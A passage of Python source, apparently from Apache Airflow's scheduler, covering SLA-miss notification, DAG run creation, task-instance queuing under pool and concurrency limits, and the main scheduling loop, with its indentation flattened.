max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
emails = set()
for task in dag.tasks:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_state: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_state will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = (timezone.utcnow()
if not task_instance.queued_dttm
else task_instance.queued_dttm)
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessor(file_path,
pickle_dags,
self.dag_ids,
zombies)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while True:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
simple_dag_bag = SimpleDagBag(simple_dags)
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
